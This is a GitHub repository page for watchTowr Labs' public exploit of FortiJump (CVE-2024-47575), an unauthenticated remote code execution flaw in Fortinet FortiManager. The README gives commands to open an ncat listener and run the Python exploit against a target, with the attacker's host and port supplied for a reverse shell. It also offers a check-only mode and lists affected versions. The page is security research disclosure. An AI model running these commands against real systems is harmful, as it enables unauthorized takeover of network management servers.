Skip to content
/ Fortijump-Exploit-CVE-2024-47575 Public

Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

83 stars 24 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
CVE-2024-47575.py
CVE-2024-47575.py
 
 
README.md
README.md
 
 
w00t_cert.bin
w00t_cert.bin
 
 
w00t_key.bin
w00t_key.bin
 
 

Repository files navigation

CVE-2024-47575

Fortinet FortiManager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

See our blog post for technical details

To begin, establish your ncat session:

nc -lvvnp 80

Then, execute our detection artefact generator:

python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

To check vulnerability alone, use the following options:

python3 CVE-2024-47575.py --target 192.168.1.110 --action check

Affected Versions

FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

About

Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

Resources

Readme
Activity
Custom properties

Stars

83 stars

Watchers

0 watching

Forks

24 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages